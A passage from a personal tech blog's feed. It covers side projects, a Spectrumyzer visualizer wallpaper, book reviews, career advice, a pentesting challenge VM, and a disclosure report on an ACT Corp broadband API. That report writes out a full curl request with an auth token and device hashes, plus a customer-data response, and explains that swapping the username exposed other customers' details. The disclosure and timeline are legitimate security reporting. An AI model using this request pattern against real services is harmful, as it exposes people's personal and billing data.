Running a patched build with support for ebook-convert</li> <li><code class="language-plaintext highlighter-rouge">ubooquity</code> for online reading of comics</li> </ol> <p><img src="/img/home-server.jpg" alt="" /></p> Project Updates 2017-09-16T00:00:00+00:00 https://captnemo.in/blog/2017/09/16/project-updates <p>Over the last couple of years, I’ve been involved with lots of side projects, both online and offline. Some of them, I’ve written about on the blog, like my <a href="/blog/2017/05/01/spectrumyzer-visualization/">music visualizer project</a>. A few of them got their own project page, like <a href="/projects/shauryaa/">the website for my niece</a> (but no blog post), while some didn’t even get a mention. I thought I’d write about the many-many side projects I’ve started (and abandoned). 
You might also wanna visit the <a href="/projects/">/projects</a> page for the larger projects.</p> <dl> <dt><a href="/blog/2017/09/17/home-server-build/">Home Server Build</a></dt> <dd><strong>Sep 2017</strong> Built a home server, mostly as an HTPC but also as a learning exercise for managing services over Docker.</dd> <dt><a href="https://github.com/captn3m0/sushigo">Sushi Go</a></dt> <dd><strong>Summer 2017</strong> This is a work-in-progress conversion of Sushi Go (original), the popular card game by Gamewright, into Ruby.</dd> <dt><a href="https://github.com/captn3m0/youtube-ripper">youtube-ripper</a></dt> <dd><strong>June 2017</strong> Downloads music-compilations from YouTube and rips them into multiple tagged MP3 files.</dd> <dt><a href="https://github.com/captn3m0/cosmere-books">cosmere-books</a></dt> <dd><strong>September 2017</strong> Wrote an EPUB generator for multiple books in the Cosmere. Currently covers 4 different serializations at Tor.com. Also created a project page on all of my ebooks projects at <a href="/ebooks/">/ebooks/</a></dd> <dt><a href="https://github.com/captn3m0/ideas">ideas</a></dt> <dd><strong>Ongoing</strong> I maintain a CC0 licensed list of personal ideas. Feel free to use.</dd> <dt><a href="/blog/2017/05/01/spectrumyzer-visualization/">spectrumyzer</a></dt> <dd><strong>May 2017</strong> Created an animated wallpaper using spectrumyzer. Wrote a <a href="/blog/2017/05/01/spectrumyzer-visualization/">blog post about it</a>.</dd> <dt><a href="https://github.com/captn3m0/google-sre-ebook">google-sre</a></dt> <dd><strong>Feb/Sep 2017</strong> EPUB generator for the Google SRE ebook. Started in February in Python. Gave up and redid it properly in September.</dd> <dt><a href="https://github.com/captn3m0/codechef">CodeChef Offline</a></dt> <dd><strong>March 2012</strong> I attempted to make an offline repository for CodeChef problems. 
I spent some time in May 2017 upgrading the project with a cleaner scraper and a Jekyll base.</dd> <dt><a href="https://github.com/captn3m0/hoshruba">Hoshruba</a></dt> <dd><strong>June 2015</strong> I wrote a script that scraped Tor’s serialized publication of the first book in Hoshruba series to generate EPUB and MOBI files. I would recommend the book if you are interested in reading what many would term the “original fantasy book”</dd> <dt><a href="https://github.com/captn3m0/hackertray">HackerTray</a></dt> <dd><strong>December 2013 -</strong> I wrote a Linux PyGTK application that sits in your taskbar using Indicator Applet to show you the latest stories from Hacker News. Looking for a maintainer.</dd> <dt><a href="https://github.com/captn3m0/magicmuggle">MagicMuggle</a></dt> <dd><strong>May 2017</strong> I wrote a script to convert Magic Muggle (A Harry Potter fanfic about a muggle who accidentally gets into Hogwarts) books from their original reddit posts to EPUB and MOBI files.</dd> <dt><a href="https://github.com/captn3m0/kerala-it">Kerala IT Policy</a></dt> <dd><strong>March 2017</strong> Attempted to transcribe the draft IT policies put up by the Government of Kerala. Lots of OCR followed by manual fixes. I stopped working on this when I realized that the government had actually put up a really nice website for this (with clear plaintext, not the bad PDF I was using as the source).</dd> <dt><a href="https://lightsaber.captnemo.in">lightsaber</a></dt> <dd><strong>August 2015</strong> I created a DNS based HTTP-3xx redirect service. Useful if you own a domain and you want it to be redirected, but don’t have a webserver with you. Made as part of the Django Hackathon organized by HackerEarth in Ruby.</dd> <dt><a href="https://hackercouch.com">HackerCouch</a></dt> <dd><strong>November 2015</strong> My hack during hackbeach 2015. Created something best described as “couchsurfing for hackers”. 
Simple Jekyll/Ruby website hosted on GitHub Pages.</dd> </dl> Building the perfect audio visualization 2017-05-01T00:00:00+00:00 https://captnemo.in/blog/2017/05/01/spectrumyzer-visualization <p>I made this as my animated wallpaper recently (Click to play/pause):</p> <video src="/videos/spectrum_320.webm" width="320" poster="/img/spectrum/poster.jpg" onclick="this.paused?this.play():this.pause();" title="Spectrum Visualization Demo." class="center-content"></video> <p><em>The above video has an audio component, click at your own peril</em>.</p> <p>What follows is the story and the tech behind making this.</p> <h2 id="the-wallpaper">The Wallpaper</h2> <p>I have a long history of using custom wallpapers. This was my wallpaper from 2014-:</p> <p><img src="https://cdn.rawgit.com/captn3m0/avatars/a8255290/wallpaper/1920x1080.jpg" alt="Old Wallpaper" /></p> <p>When I asked <a href="http://vikalpgupta.com/">Vikalp</a> to design a new one, I knew I wanted something that was slightly softer. This is what he came up with, after a few iterations:</p> <p><img src="https://cdn.rawgit.com/captn3m0/avatars/a8255290/wallpaper/minimal.jpg" alt="New Wallpaper" /></p> <p>This wasn’t the final iteration, and both of us agreed that there was something missing.</p> <h2 id="visualizations">Visualizations</h2> <p>I saw a colleague using <a href="https://github.com/karlstav/cava#arch" title="Console-based Audio Visualizer for ALSA (MPD and Pulseaudio)"><code class="language-plaintext highlighter-rouge">cava</code></a> and spent a bit of time trying out different visualization software. The ones that I tried out:</p> <dl> <dt><strong><a href="https://github.com/karlstav/cava#arch" title="Console-based Audio Visualizer for ALSA (MPD and Pulseaudio)">cava</a></strong></dt> <dd>works perfectly with i3, runs on a terminal. I couldn’t get it to work cleanly with transparency. 
<img src="https://rawcdn.githack.com/karlstav/cava/80d465ff2537abf030fa766bda281150c60ac162/example_files/cava.gif" alt="Cava screenshot using tiling" id="cava:" class="center-content" /></dd> <dt><strong><a href="http://projectm.sourceforge.net/" title="MilkDrop was the hardware-accelerated music visualization plugin for Winamp. ProjectM is the port that doesn't need Winamp and works on linux">milkdrop</a></strong></dt> <dd>Winamp’s legacy. This works great for parties, but is not really an everyday-use visualizer. <img src="/img/milkdrop.jpg" alt="Milkdrop Running using projectM on Linux" id="milkdrop:" class="center-content" /></dd> <dt><strong><a href="https://github.com/HaCk3Dq/spectrumyzer/">spectrumyzer</a></strong></dt> <dd>Worked with transparency, but limited to bars visualization.</dd> </dl> <p>I decided to go ahead with Spectrumyzer (This is the default config):</p> <p><img src="/img/spectrum/default.jpg" alt="Default Spectrum Config" title="Spectrumyzer Default Config" class="center-content" /></p> <h2 id="the-traffic-jam">The Traffic Jam</h2> <p>The very same day, stuck in a traffic jam<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">1</a></sup>, I asked Vikalp for some color ideas on the visualization.</p> <p>The obvious 2 were tried first:</p> <p><img src="/img/spectrum/darkblue.jpg" alt="Spectrum Dark Blue Config" title="Spectrumyzer Dark Blue Config" class="center-content" /></p> <p><img src="/img/spectrum/yellow.jpg" alt="Spectrum Yellow Config" title="Spectrumyzer Yellow Config" class="center-content" /></p> <p>It finally dawned on us to use the light blue variant with padding set to zero:</p> <p><img src="/img/spectrum/blue.jpg" alt="Spectrum Light Blue" title="Spectrumyzer Blue Config with zero padding" class="center-content" /></p> <p>Here is one showing the actual positioning (set using the offsets):</p> <p><img src="/img/spectrum/offset.jpg" alt="Spectrum Offset" title="Spectrumyzer offset configuration" 
class="center-content" /></p> <h2 id="bezier-curves">Bezier Curves</h2> <p>With the padding set to zero, it already looked great. I ended up using this as my wallpaper for the next week. Vikalp wanted to make the bars non-rectangular, and I spent some time figuring out how to make waveforms using bezier curves<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">2</a></sup>. The basic learnings from my experiments were:</p> <ul> <li>Cairo has methods for drawing cubic bezier curves.</li> <li>Cubic bezier curves have 2 control points.</li> <li>The control points must be symmetric (equidistant) as well as parallel to the origin points.</li> <li>The parallel part ensures that the ending and starting line segments are always tangential, giving a smooth joining.</li> </ul> <p>This is roughly what you want to do when drawing waveforms:</p> <p><img src="/img/bezier.waveform.gif" alt="Waveform bezier curve" class="center-content" /></p> <p>If you are interested in playing around with Bezier curves, see <a href="https://www.jasondavies.com/animated-bezier/" title="Animated Bézier Curves, Play with the control points to modify the curves!">Animated Bézier Curves</a>. 
<a href="https://pomax.github.io/bezierinfo/" title="A Primer on Bézier Curves, A free, online book for when you really need to know how to do Bézier things.">A Primer on Bézier Curves</a> is a math-heavy explanation if you want to read further<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">3</a></sup>.</p> <p>The code I wrote picks the midpoints of the bars and then connects them using bezier curves:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Control point coordinates
# Make sure these are symmetric
</span><span class="n">c1x</span> <span class="o">=</span> <span class="n">rect_top_mid_x</span> <span class="o">+</span> <span class="mi">16</span>
<span class="n">c2x</span> <span class="o">=</span> <span class="n">next_rect_top_mid_x</span> <span class="o">-</span> <span class="mi">16</span>
<span class="n">c1y</span> <span class="o">=</span> <span class="n">rect_top_mid_y</span>
<span class="n">c2y</span> <span class="o">=</span> <span class="n">next_rect_top_mid_y</span>
</code></pre></div></div> <p>I also had to make the number of bars configurable (this is default=64, which doesn’t look great):</p> <p><img src="/img/spectrum/64water.jpg" alt="Spectrum water 64" title="Spectrumyzer curves config doesn't look that great with 64 bars" class="center-content" /></p> <p>Here is the complete final result in HD:</p> <iframe width="560" height="315" src="https://www.youtube.com/embed/_vWe_AHAJCk?rel=0" frameborder="0" allowfullscreen="" class="center-content"></iframe> <h2 id="what-i-learned">What I learned</h2> <ul> <li>Bezier curves are not magic.</li> <li>Drawing pixels on screen and filling them was quite easy with Cairo and Python.</li> <li>Coding is wizardry. The things that I take for granted every day (take a multi-page website and get useful tabular data out of it, for example) are unthinkable for most people. 
The idea of doing water waves was something I knew would be possible before I even looked at the codebase.</li> </ul> <p>If you’d like to replicate this setup, or build upon it, here is my <a href="https://github.com/captn3m0/dotfiles/blob/master/files/audio/.config/spectrum.conf" title="Just ensure you have the latest spectrumyzer code before using this">spectrum.conf</a> file. I also <a href="https://github.com/HaCk3Dq/spectrumyzer/pull/22" title="Configurable renderers">filed a PR</a> (now merged!) to the spectrumyzer project adding support for curve based renders.</p> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:3" role="doc-endnote"> <p><a href="https://twitter.com/SonyWorldJn">Sony World Junction</a> - Where startup ideas are born. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:1" role="doc-endnote"> <p>The Spectrumyzer codebase turned out to be fairly easy to understand. It was just cairo and pyGTK. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:2" role="doc-endnote"> <p><a href="https://pomax.github.io/bezierinfo/" title="A Primer on Bézier Curves, A free, online book for when you really need to know how to do Bézier things.">A Primer on Bézier Curves</a> was published on HN just a few days after I finished this project. <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> Book Review (2016) 2017-04-02T00:00:00+00:00 https://captnemo.in/blog/2017/04/02/book-review-2016 <p>I tweeted this a while back about my reading progress in 2016, and thought I’d do a post about what I read.</p> <blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">Made a graph of my <a href="https://twitter.com/goodreads">@goodreads</a> reading progress in 2016. 
I only picked up the pace sometime in May, but managed to read ~10k pages this year.</p> <p><img src="https://pbs.twimg.com/media/C2D9p9DXEAADajk.png" /></p> &mdash; Nemo (@captn3m0) <a href="https://twitter.com/captn3m0/status/819934060256563201">January 13, 2017</a></blockquote> <p>Continuing with the <a href="/blog/2016/02/15/2015-in-review/">review tradition from last year</a>, here are the top 3 books that I read in 2016:</p> <ul> <li><a href="https://www.goodreads.com/book/show/26892110-the-library-at-mount-char">The Library at Mount Char</a> [<a href="https://www.goodreads.com/review/show/1648561385?book_show_action=false&amp;from_review_page=1">review</a>]</li> <li><a href="https://www.goodreads.com/book/show/25667918-binti">Binti</a> (Hugo winner for Best Novella, SF)</li> <li><a href="https://www.goodreads.com/book/show/7604.Lolita">Lolita</a></li> </ul> <p>Other books that I enjoyed were “Bands of Mourning”, the 3rd book in Mistborn Era 2, and the Powder Mage Trilogy which I found hard to put down.</p> <p>I decided to aim for 36 books in 2016 (as well as 2017 now), and crossed that nicely. I picked 36 because it corresponds to 3 books a month or 1 book every 10 days, which makes for a goal that is easily tracked. I count everything that goodreads might count as a book (which is both good and bad), but I stick to it. 
Far more important for me would be the page count, which I charted at the end of the year: I read ~830 pages a month, which I’m pretty happy with.</p> <p>I’m hoping to read more technical books in 2017, and have made some progress on that front with re-reading <a href="https://sarabander.github.io/sicp/">SICP</a>.</p> <p>If you are interested in the script that generated the graph, you can find it on <a href="https://github.com/captn3m0/what-to-read/blob/master/stats.rb">github</a>.</p> Vulnerability Report: ACT Corp 2017-03-26T00:00:00+00:00 https://captnemo.in/blog/2017/03/26/act-vulnerability <p>ACT, for those who don’t know, is one of India’s most popular broadband providers.</p> <p>This is a very brief and concise summary.</p> <ul> <li>ACT has a mobile application</li> <li>That allows you to log in and check your plan details, data usage etc</li> <li>I’ve been wanting to build a command line application that lets me check the balance easily</li> <li>I tried scripting their website, but it was too much javascript.</li> <li>The mobile app uses an API to do the same</li> <li>The API happens to have really bad auth</li> <li>Got fixed almost 3 months after reporting this.</li> </ul> <p><strong>Request</strong></p> <div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl https://myfibernet.actcorp.in/api/user/plandetails <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="nt">-H</span> <span class="s2">"Authtoken: 2aee21dfb1ef77707c30f48ccc513ad60b74d1fc6a84d60ecc32323ab5941469"</span> <span class="nt">-H</span> <span class="s2">"Apiversion: 1.0"</span> <span class="nt">-H</span> <span class="s2">"Appversion: 32"</span> <span class="nt">-H</span> <span class="s2">"Devicetype: 1"</span> <span class="nt">-H</span> <span class="s2">"Deviceid: 68590327e3e0ca81"</span> <span class="nt">-H</span> <span class="s2">"Mobilenumber: 9999999999"</span> <span class="nt">-H</span> <span 
class="s2">"Mid: 8973808103928d98703e65c0106b7a9d4001886234afbc2d7ce6415b75f9c216"</span> <span class="nt">--data</span> <span class="s1">'{"username":"11111111"}'</span> </code></pre></div></div> <p>The API responds back with the following:</p> <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w"> </span><span class="nl">"code"</span><span class="p">:</span><span class="w"> </span><span class="mi">200</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w"> </span><span class="nl">"message"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Success"</span><span class="p">,</span><span class="w"> </span><span class="nl">"data"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"plan_details"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"agreement_info"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"agreement_no"</span><span class="p">:</span><span class="w"> </span><span class="s2">"XXXXXXXXXX"</span><span class="p">,</span><span class="w"> </span><span class="nl">"promotion_code"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"package_code"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ACTESS01M"</span><span class="p">,</span><span class="w"> </span><span class="nl">"package_name"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"agreement_startdate"</span><span class="p">:</span><span 
class="w"> </span><span class="s2">"DD/MM/YYYY"</span><span class="p">,</span><span class="w"> </span><span class="nl">"expiry_date"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"entity_code"</span><span class="p">:</span><span class="w"> </span><span class="s2">"[]"</span><span class="p">,</span><span class="w"> </span><span class="nl">"subscription_period"</span><span class="p">:</span><span class="w"> </span><span class="s2">"[]"</span><span class="p">,</span><span class="w"> </span><span class="nl">"payterm"</span><span class="p">:</span><span class="w"> </span><span class="s2">"[]"</span><span class="p">,</span><span class="w"> </span><span class="nl">"billingcycle_code"</span><span class="p">:</span><span class="w"> </span><span class="s2">"[]"</span><span class="p">,</span><span class="w"> </span><span class="nl">"contract_type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ISP"</span><span class="p">,</span><span class="w"> </span><span class="nl">"outlets"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"service_points"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"package_tenure"</span><span class="p">:</span><span class="w"> </span><span class="err">int</span><span class="p">,</span><span class="w"> </span><span class="nl">"due_date"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"product_info"</span><span class="p">:</span><span class="w"> </span><span 
class="p">{</span><span class="w"> </span><span class="nl">"product_code"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"product_desc"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"plan_usage_info"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"service_id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ACTESS01M"</span><span class="p">,</span><span class="w"> </span><span class="nl">"service_name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ACTESS01M"</span><span class="p">,</span><span class="w"> </span><span class="nl">"outbyteslimit"</span><span class="p">:</span><span class="w"> </span><span class="mi">322122547200</span><span class="p">,</span><span class="w"> </span><span class="nl">"outbytesremaining"</span><span class="p">:</span><span class="w"> </span><span class="mi">153400581140</span><span class="p">,</span><span class="w"> </span><span class="nl">"outbytesused"</span><span class="p">:</span><span class="w"> </span><span class="mi">168721966060</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"bill_info"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"accountno"</span><span class="p">:</span><span class="w"> </span><span class="s2">"111111112233"</span><span class="p">,</span><span class="w"> </span><span class="nl">"subscribername"</span><span class="p">:</span><span class="w"> </span><span class="s2">"NAME"</span><span class="p">,</span><span class="w"> </span><span class="nl">"phonenumber"</span><span class="p">:</span><span class="w"> 
</span><span class="s2">"PHONENUMBER"</span><span class="p">,</span><span class="w"> </span><span class="nl">"address"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"line1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"YUP"</span><span class="p">,</span><span class="w"> </span><span class="nl">"line2"</span><span class="p">:</span><span class="w"> </span><span class="s2">"THESE TWO LINES WERE FILLED"</span><span class="p">,</span><span class="w"> </span><span class="nl">"line3"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"district"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AND THIS"</span><span class="p">,</span><span class="w"> </span><span class="nl">"city"</span><span class="p">:</span><span class="w"> </span><span class="s2">"BANGALORE"</span><span class="p">,</span><span class="w"> </span><span class="nl">"state"</span><span class="p">:</span><span class="w"> </span><span class="s2">"KARNATAKA"</span><span class="p">,</span><span class="w"> </span><span class="nl">"country"</span><span class="p">:</span><span class="w"> </span><span class="s2">"India"</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"billno"</span><span class="p">:</span><span class="w"> </span><span class="s2">"10000001111"</span><span class="p">,</span><span class="w"> </span><span class="nl">"billdate"</span><span class="p">:</span><span class="w"> </span><span class="s2">"DD/MM/2016"</span><span class="p">,</span><span class="w"> </span><span class="nl">"account_period"</span><span class="p">:</span><span class="w"> </span><span class="s2">"01/MM/2016-30/MM/2016"</span><span class="p">,</span><span class="w"> </span><span class="nl">"previous_due"</span><span class="p">:</span><span class="w"> </span><span 
class="s2">""</span><span class="p">,</span><span class="w"> </span><span class="nl">"current_invoice_amt"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1234"</span><span class="p">,</span><span class="w"> </span><span class="nl">"total_due"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"bill_due_date"</span><span class="p">:</span><span class="w"> </span><span class="s2">"15 Nov 2016"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre></div></div> <p>Some of these are empty fields, and some values that I didn’t understand I’ve replaced with <code class="language-plaintext highlighter-rouge">[]</code>.</p> <p>The fun part is that the request is actually a POST and contains the following data:</p> <p><code class="language-plaintext highlighter-rouge">{"username":"11111111"}</code></p> <p>I happen to have friends who also use ACT. I <a href="https://twitter.com/captn3m0/status/803579876502405120">asked around for usernames</a>, and just by changing this one parameter in the request, I could access the complete details of almost everyone else.</p> <p>Almost everyone, because for certain cases, I get a valid empty response. Valid because it has the same schema, but empty because all values are empty strings. Don’t know why that happens consistently only for certain accounts. (One of these was a Hyd account, the other in BLR).</p> <p>If you are interested, I’m working on a simple API that lets you access the ACT API to check the same details. It would ask you for an OTP the first time you log in, and then cache the credentials to let you check the balance easily.</p> <p><del>I’ve reported this to ACT as soon as I found it. 
Will disclose after I’ve given them some time!</del></p> <p><strong>Update</strong>: This was reported and fixed by ACT after I managed to find a contact via an investor (really!).</p> <p><strong>Timeline</strong></p> <table> <thead> <tr> <th>Date</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td>29 Nov 2016</td> <td>Vulnerability Identified</td> </tr> <tr> <td>29 Nov 2016</td> <td>Email sent to ACT, no response</td> </tr> <tr> <td>6 Dec 2016</td> <td>Email sent with partial customer details to explain scope of the issue, no response</td> </tr> <tr> <td>8 Dec 2016</td> <td>Reminder sent, no response</td> </tr> <tr> <td>20 Jan 2017</td> <td>Another reminder with a writeup sent. I also set a deadline of 29th January (2 months since first contact). Also got in touch with CERT-IN. <em>No response</em></td> </tr> <tr> <td>23 Jan 2017</td> <td>Accidentally, an investor in ACT saw my tweet and responded over Twitter. Sent a writeup, along with the suggestion to take down the application</td> </tr> <tr> <td>24 Jan 2017</td> <td>ACT reports issue is fixed. I test and report back as fixed the next day</td> </tr> <tr> <td>26 Mar 2017</td> <td>Report published</td> </tr> </tbody> </table> <p>However, the huge timeline involved here pretty much guarantees that if you are an ACT customer, your data is out there in the public.</p> CCTC Challenge VM 2017-03-25T00:00:00+00:00 https://captnemo.in/blog/2017/03/25/cctc-vm-images <p>This is specifically about the contest held in 2011, 6 years ago. 
I’ve written about my experience during the contest <a href="/blog/2011/11/20/cctc-blog/">on this blog</a>.</p> <p>More specifically, Round 2 of the contest was a pentesting scenario where we were only provided with a VM image and asked to test it and report any vulnerabilities that we found.</p> <p>I recently found the VirtualBox images, and thought I’d share them as an easy intro to web security.</p> <h1 id="instructions">Instructions</h1> <ol> <li><a href="/contact/">Reach out to me</a> for the VM image</li> <li>Hack.</li> <li>Credentials are student:student (username:password)</li> <li>Open &lt;VM_IP&gt;/cctc in your browser.</li> </ol> <h1 id="rules">Rules</h1> <ol> <li>Only application and its serving components can be tested for vulnerabilities. The serving components include <ul> <li>Webserver</li> <li>Operating System</li> <li>Any other services/files in the guest machine and guest operating system</li> </ul> </li> <li>Any vulnerability identified in any component outside the above mentioned ones, will not be used for evaluation</li> <li>All participants should necessarily submit all the exploit codes/custom scripts written to identify the vulnerabilities in the system.</li> <li>The deadline for the original challenge was 2 weeks, but you’re free to take as much time as you want. Feel free to publish a list of vulnerabilities you find.</li> </ol> <p><a href="https://docs.google.com/spreadsheets/d/1s_o-HGlS2dKbDnm2mjTbgXpDHDHQgMYXlbOMEVNaBvY/edit?usp=sharing">The attached spreadsheet</a> provides the format of the report, challenges in scope, and the details to be filled out for each vulnerability identified.</p> <p>The tasks to be performed are mentioned in the report. 
Each task consists of the following sections:</p> <ol> <li>Vulnerability/Vulnerabilities - You need to write the description of the vulnerability</li> <li>Root Cause(s) - What is the root cause of the vulnerability?</li> <li>Approach adopted (Steps with screenshots) – Write the steps followed to exploit the vulnerability along with screenshot of the final screen and/or intermediate steps.</li> <li>Remediation with sample code snippet – Write the remediation steps to address this vulnerability. Also, write the sample code if applicable.</li> </ol> <p>Also <a href="https://drive.google.com/file/d/0B2qzfUR1eWklMHJONkZPUkVqLWZPS3pwTzFDYW84aVJhbjZB/view?usp=sharing">attached is a step by step installation guide</a> for application set-up.</p> <p>A few points to be considered:</p> <ul> <li>Challenges can be attempted and completed in any order.</li> <li>Only the application and its serving components can be tested for vulnerabilities. All other components like VMware, if tested for security issues, would lead to disqualification.</li> <li>I will not be responsible for the discovery/notification of any zero day vulnerability in any software. If any zero-day vulnerability is identified, it is the responsibility of the concerned participant to notify the vulnerability to the respective vendor as per vendor’s policy.</li> </ul> <p>If you are really interested, you can find a copy of the report we submitted at <a href="/reports/cctc/">/reports/cctc</a>.</p> <p>Thanks to Harshil and Shobhit for working alongside on this.</p> 2015 in Review 2016-02-15T00:00:00+00:00 https://captnemo.in/blog/2016/02/15/2015-in-review <p>2015 was a good year for me. I accomplished a lot of things, and was happy for most part of the year. In no particular order, here are the things that stand out for me:</p> <ul> <li><a href="/blog/2015/07/20/hillhacks/">Went to HillHacks</a>, and made lots of friends. 
Helped organize the conference.</li> <li>Joined <a href="https://razorpay.com">Razorpay</a> in June</li> <li>Moved to Bangalore</li> <li>Announced my book, <a href="https://captnemo.in/blog/2015/06/07/on-writing/">The Joy of Software Development</a></li> <li>Did lots of speaker things: <ul> <li><a href="https://captnemo.in/talks/josd/">Joy of Software Development</a> talk at IIT Roorkee</li> <li>Flash Talks on <a href="https://docs.google.com/presentation/d/1qR3JuGU7FXry333qGfVvapshDn72oCjEN8l7bShQl2Y/pub?start=false&amp;loop=false&amp;delayms=3000">SDSLabs</a>, <a href="http://slides.com/captn3m0/ctf/">CTFs</a> and a few more things at HillHacks</li> <li>A full-length talk on the book itself at HillHacks</li> <li>Did the <a href="https://speakerdeck.com/captn3m0/hillhacks-quiz-2015">HillHacks</a> and <a href="https://docs.google.com/presentation/d/1glE2G1xKGkSVELVaQ7YJ4JGul0NLzfHRl1xGgMIwi9Q/pub?start=false&amp;loop=false&amp;delayms=3000">HackBeach</a> quizzes</li> <li>Announced my <a href="/homeopathy/">Homeopathy Bug Bounty Program</a> at hackbeach.</li> <li>Gave a talk on <a href="http://slides.com/captn3m0/fun-with-http">Fun with HTTP</a> at Barcamp Bangalore.</li> </ul> </li> <li>Learnt some slacklining at hackbeach. Helped with conference scheduling as well.</li> <li>Made <a href="https://hasgeek.com">lots</a> of <a href="http://nilenso.com">new friends</a> at Bangalore.</li> <li>Started playing board games, including being a DM at several Dungeons and Dragons sessions.</li> <li>Started quizzing in Bangalore as well. Mostly at Cluesday, Vapors.</li> </ul> <h2 id="reading">Reading</h2> <p>I started with a goal of 20 books for this year, and ended up reading about 28. Tried experimenting with Audiobooks near the year end, and failed. Bought a Kindle paperwhite as well. I tend to read a lot of Fantasy and SF, and this continued in 2015 as well. 
The best books I read this year (in order):</p> <ul> <li>Lions of Al Rassan [<a href="https://www.goodreads.com/review/show/1241094426">review</a>]</li> <li>The Goblin Emperor [<a href="https://www.goodreads.com/review/show/1400549503">review</a>]</li> <li>The Martian [<a href="https://www.goodreads.com/review/show/1148506677">review</a>]</li> </ul> <p>A complete list is on <a href="https://www.goodreads.com/user/year_in_books/2015/6170741">Goodreads</a></p> <h2 id="tech">Tech</h2> <ul> <li>Launched <a href="https://hackercouch.com">hackercouch</a> as a personal project.</li> <li>Shifted to Arch Linux + i3wm setup for my laptop. See <a href="/setup/">Setup</a> page for more details.</li> <li>Left facebook, mostly because of their stance on Net Neutrality and the FreeBasics debacle in India.</li> </ul> How to get better at software development? 2015-10-12T00:00:00+00:00 https://captnemo.in/blog/2015/10/12/get-better-at-software-development <p>I often get a lot of queries from people asking me about how to get started with software development, and how to get better at it. My replies are almost reaching stock-level worthy of copy-paste now, so I thought I might as well write about it publicly.</p> <p>What follows is a list of advice I’d give to any person who wants to write software for a living. A lot of it might apply across professions, and a lot of it is tailored to students in universities. Not everything might apply in your case, YMMV. Take everything with a pinch of salt. Feedback is welcome.</p> <ol> <li> <h3 id="join-a-community">Join a community.</h3> <p>Highly preferable if it’s an IRL (In-real-life) community rather than just a chatroom somewhere, but even those are preferable over nothing. Communities have this shared sense of learning, that you don’t enjoy anywhere else. Passive learning is something I talk a lot about, and it only happens because of chance interactions that happen in communities. 
Even online communities work fairly well, and by online communities I mean places like StackOverflow, AskUbuntu, ServerFault, HackerNews, subreddits etc. If you don’t have a physical community near you that you can join, maybe it’s time to start one?</p> </li> <li> <h3 id="contribute-to-open-source-projects">Contribute to Open Source projects</h3> <p>It doesn’t have to be with your code, or even a large project. Even small javascript npm modules that you might think can be improved deserve some Pull Request love.</p> </li> <li> <h3 id="write-all-code-publicly">Write all code publicly</h3> <p>Your code not being public should be the exception, not the norm. I’ve found putting almost all my code on github fairly liberating. I keep all my OS configuration and a lot of other things on github.</p> </li> <li> <h3 id="do-tech-talks">Do tech talks</h3> <p>It doesn’t have to be at a big-name conference, but maybe at a small meetup around you. Good conferences will sponsor your tickets, and as a plus, you get to attend all the talks at that conference for free. Just make sure that you actually <em>do know</em> what you’re talking about, unlike a lot of talks that happen. The level of knowledge expected of a speaker is far more, and as a result if you are the one talking about something, you need to get better at it and understand it better, which is a great way of forcing yourself to learn something.</p> </li> <li> <h3 